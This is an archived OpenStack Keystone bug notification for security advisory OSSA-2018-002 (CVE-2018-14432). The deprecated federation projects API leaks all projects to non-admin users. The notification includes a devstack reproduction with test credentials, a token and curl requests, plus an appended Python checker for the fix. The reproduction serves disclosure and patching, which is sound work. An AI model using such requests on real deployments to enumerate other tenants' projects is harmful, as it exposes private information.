
yahoo-eng-team team mailing list archive

[Bug 1779205] Re: [OSSA-2018-002] GET /v3/OS-FEDERATION/projects leaks project information (CVE-2018-14432)


** Changed in: ossa
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Identity (keystone).
https://bugs.launchpad.net/bugs/1779205

Title:
  [OSSA-2018-002] GET /v3/OS-FEDERATION/projects leaks project
  information (CVE-2018-14432)

Status in OpenStack Identity (keystone):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The /v3/OS-FEDERATION/projects API was developed to let federated
  users discover what projects they have access to. This mirrored a
  similar API in keystone, v3/auth/projects. Both were intended to
  behave the same way, by only returning what projects a user has a role
  assignment on.

  Eventually the /v3/OS-FEDERATION/projects API was deprecated after the
  /v3/auth/projects API was able to support federated tokens.

  The /v3/OS-FEDERATION/projects API appears to be broken because it
  returns all projects in the deployment, not just the ones a user has
  access to. The following recreates the issue:

  lbragstad|devstack|~ >>> cat /etc/openstack/clouds.yaml
  clouds:
    devstack:
      auth:
        auth_url: http://192.168.1.5/identity
        password: nomoresecret
        project_domain_id: default
        project_name: demo
        user_domain_id: default
        username: demo
      identity_api_version: '3'
      region_name: RegionOne
      volume_api_version: '2'
    devstack-admin:
      auth:
        auth_url: http://192.168.1.5/identity
        password: nomoresecret
        project_domain_id: default
        project_name: admin
        user_domain_id: default
        username: admin
      identity_api_version: '3'
      region_name: RegionOne
      volume_api_version: '2'
    devstack-alt:
      auth:
        auth_url: http://192.168.1.5/identity
        password: nomoresecret
        project_domain_id: default
        project_name: alt_demo
        user_domain_id: default
        username: alt_demo
      identity_api_version: '3'
      region_name: RegionOne
      volume_api_version: '2'
  lbragstad|devstack|~ >>> openstack role assignment list --names --os-cloud devstack-admin
  +-------------+------------------+-------------------+----------------------------+---------+-----------+
  | Role        | User             | Group             | Project                    | Domain  | Inherited |
  +-------------+------------------+-------------------+----------------------------+---------+-----------+
  | member      |                  | nonadmins@Default | demo@Default               |         | False     |
  | anotherrole |                  | nonadmins@Default | demo@Default               |         | False     |
  | member      |                  | nonadmins@Default | alt_demo@Default           |         | False     |
  | anotherrole |                  | nonadmins@Default | alt_demo@Default           |         | False     |
  | admin       |                  | admins@Default    | admin@Default              |         | False     |
  | admin       | admin@Default    |                   | demo@Default               |         | False     |
  | admin       | admin@Default    |                   | admin@Default              |         | False     |
  | admin       | admin@Default    |                   | alt_demo@Default           |         | False     |
  | admin       | admin@Default    |                   |                            | Default | False     |
  | member      | demo@Default     |                   | demo@Default               |         | False     |
  | anotherrole | demo@Default     |                   | demo@Default               |         | False     |
  | member      | demo@Default     |                   | invisible_to_admin@Default |         | False     |
  | member      | alt_demo@Default |                   | alt_demo@Default           |         | False     |
  | anotherrole | alt_demo@Default |                   | alt_demo@Default           |         | False     |
  | admin       | admin@Default    |                   |                            |         | False     |
  +-------------+------------------+-------------------+----------------------------+---------+-----------+
  lbragstad|devstack|~ >>> openstack token issue --os-cloud devstack
  +------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  | Field      | Value                                                                                                                                                                                   |
  +------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  | expires    | 2018-06-28T21:03:47+0000                                                                                                                                                                |
  | id         | gAAAAABbNT8jpqwHC_ZeIQvo3YBIvp0UxletD5d0xZ7BFbuNbNGminfpp0FtG5RYZgIIIW4i8OOMtYnmDtQ1b4FOGLzFexayG5D3gTTrDBvQAFy95gQiaSxxJGsscCQ36pxiFWxqA0KBzvdCMPDpYDtuG1pd0b3KiskApbVcwE-uuESisyzj36w |
  | project_id | 44053df0d12f4ba0aa4c28c3364aa1a1                                                                                                                                                        |
  | user_id    | cef2773684114d55a6399e928ecc78e4                                                                                                                                                        |
  +------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
  lbragstad|devstack|~ >>> export TOKEN='gAAAAABbNT8jpqwHC_ZeIQvo3YBIvp0UxletD5d0xZ7BFbuNbNGminfpp0FtG5RYZgIIIW4i8OOMtYnmDtQ1b4FOGLzFexayG5D3gTTrDBvQAFy95gQiaSxxJGsscCQ36pxiFWxqA0KBzvdCMPDpYDtuG1pd0b3KiskApbVcwE-uuESisyzj36w'
  lbragstad|devstack|~ >>> curl -H "X-Auth-Token: $TOKEN" http://localhost/identity/v3/auth/projects | python -m json.tool
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                   Dload  Upload   Total   Spent    Left  Speed
  100   669  100   669    0     0  20476      0 --:--:-- --:--:-- --:--:-- 20906
  {
      "links": {
          "next": null,
          "previous": null,
          "self": "http://192.168.1.5/identity/v3/auth/projects"
      },
      "projects": [
          {
              "description": "",
              "domain_id": "default",
              "enabled": true,
              "id": "44053df0d12f4ba0aa4c28c3364aa1a1",
              "is_domain": false,
              "links": {
                  "self": "http://192.168.1.5/identity/v3/projects/44053df0d12f4ba0aa4c28c3364aa1a1"
              },
              "name": "demo",
              "parent_id": "default",
              "tags": []
          },
          {
              "description": "",
              "domain_id": "default",
              "enabled": true,
              "id": "8c92de6ab3884f94b508ce2f2dd62c4d",
              "is_domain": false,
              "links": {
                  "self": "http://192.168.1.5/identity/v3/projects/8c92de6ab3884f94b508ce2f2dd62c4d"
              },
              "name": "invisible_to_admin",
              "parent_id": "default",
              "tags": []
          }
      ]
  }
  lbragstad|devstack|~ >>> curl -H "X-Auth-Token: $TOKEN" http://localhost/identity/v3/OS-FEDERATION/projects | python -m json.tool
    % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                   Dload  Upload   Total   Spent    Left  Speed
  100  1270  100  1270    0     0  17528      0 --:--:-- --:--:-- --:--:-- 17638
  {
      "links": {
          "next": null,
          "previous": null,
          "self": "http://192.168.1.5/identity/v3/OS-FEDERATION/projects"
      },
      "projects": [
          {
              "description": "",
              "domain_id": "default",
              "enabled": true,
              "id": "44053df0d12f4ba0aa4c28c3364aa1a1",
              "is_domain": false,
              "links": {
                  "self": "http://192.168.1.5/identity/v3/projects/44053df0d12f4ba0aa4c28c3364aa1a1"
              },
              "name": "demo",
              "parent_id": "default",
              "tags": []
          },
          {
              "description": "Bootstrap project for initializing the cloud.",
              "domain_id": "default",
              "enabled": true,
              "id": "681b94352ed146b5ac37c152653e90d2",
              "is_domain": false,
              "links": {
                  "self": "http://192.168.1.5/identity/v3/projects/681b94352ed146b5ac37c152653e90d2"
              },
              "name": "admin",
              "parent_id": "default",
              "tags": []
          },
          {
              "description": "",
              "domain_id": "default",
              "enabled": true,
              "id": "9a742b4684dc4c8a90dc4896f9ab178e",
              "is_domain": false,
              "links": {
                  "self": "http://192.168.1.5/identity/v3/projects/9a742b4684dc4c8a90dc4896f9ab178e"
              },
              "name": "alt_demo",
              "parent_id": "default",
              "tags": []
          },
          {
              "description": "",
              "domain_id": "default",
              "enabled": true,
              "id": "8c92de6ab3884f94b508ce2f2dd62c4d",
              "is_domain": false,
              "links": {
                  "self": "http://192.168.1.5/identity/v3/projects/8c92de6ab3884f94b508ce2f2dd62c4d"
              },
              "name": "invisible_to_admin",
              "parent_id": "default",
              "tags": []
          }
      ]
  }

  Notice that I used the devstack cloud config, which specifies the demo
  user, who only has the `member` and `anotherrole` roles assigned on two
  projects (demo and invisible_to_admin). In no way should they have
  access to view all projects in the deployment.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1779205/+subscriptions
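As an added illustration of the comparison the report's reproduction performs by hand (this is not code from the bug report or from keystone), the Python script below computes the projects a user should see from a role-assignment table like the one above and diffs that against an OS-FEDERATION/projects response. The assignment rows, the group membership and the abridged JSON are constructed to mirror the report's devstack output.

```python
"""Detect the OSSA-2018-002 behaviour offline: compare the projects a user
should see (those they hold a role assignment on, directly or via a group)
against what GET /v3/OS-FEDERATION/projects actually returned."""
import json

# Constructed role-assignment rows in the shape of `openstack role assignment
# list --names`: (role, user, group, project); "" means unset, as in the CLI.
ASSIGNMENTS = [
    ("member", "", "nonadmins@Default", "demo@Default"),
    ("member", "", "nonadmins@Default", "alt_demo@Default"),
    ("admin", "admin@Default", "", "admin@Default"),
    ("admin", "admin@Default", "", ""),  # domain-scoped, not a project
    ("member", "demo@Default", "", "demo@Default"),
    ("anotherrole", "demo@Default", "", "demo@Default"),
    ("member", "demo@Default", "", "invisible_to_admin@Default"),
    ("member", "alt_demo@Default", "", "alt_demo@Default"),
]
# Constructed group membership: the report does not list it, so this assumes
# demo belongs to no group and alt_demo belongs to nonadmins.
GROUPS = {"nonadmins@Default": {"alt_demo@Default"}}
# Abridged JSON in the shape of the /v3/OS-FEDERATION/projects response in the
# report (ids as shown there; only the fields the check needs).
FEDERATION_RESPONSE = json.dumps({"projects": [
    {"id": "44053df0d12f4ba0aa4c28c3364aa1a1", "name": "demo"},
    {"id": "681b94352ed146b5ac37c152653e90d2", "name": "admin"},
    {"id": "9a742b4684dc4c8a90dc4896f9ab178e", "name": "alt_demo"},
    {"id": "8c92de6ab3884f94b508ce2f2dd62c4d", "name": "invisible_to_admin"},
]})

def expected_projects(user, assignments=ASSIGNMENTS, groups=GROUPS):
    """Names (without the @Domain suffix) of every project the user holds a
    role on, via a direct assignment or one on a group they are a member of."""
    user_groups = {g for g, members in groups.items() if user in members}
    names = set()
    for _role, u, g, project in assignments:
        if project and (u == user or (g and g in user_groups)):
            names.add(project.split("@", 1)[0])
    return names

def leaked_projects(user, response_json, assignments=ASSIGNMENTS, groups=GROUPS):
    """Project names the endpoint returned that the user holds no role on;
    a non-empty result reproduces the leak described in the report."""
    returned = {p["name"] for p in json.loads(response_json)["projects"]}
    return sorted(returned - expected_projects(user, assignments, groups))

if __name__ == "__main__":
    print("demo should see:", sorted(expected_projects("demo@Default")))
    print("leaked to demo:", leaked_projects("demo@Default", FEDERATION_RESPONSE))
```

Run against a live deployment, the same diff (the auth/projects list against the OS-FEDERATION/projects list for one non-admin token) tells you whether the fix from OSSA-2018-002 is in place.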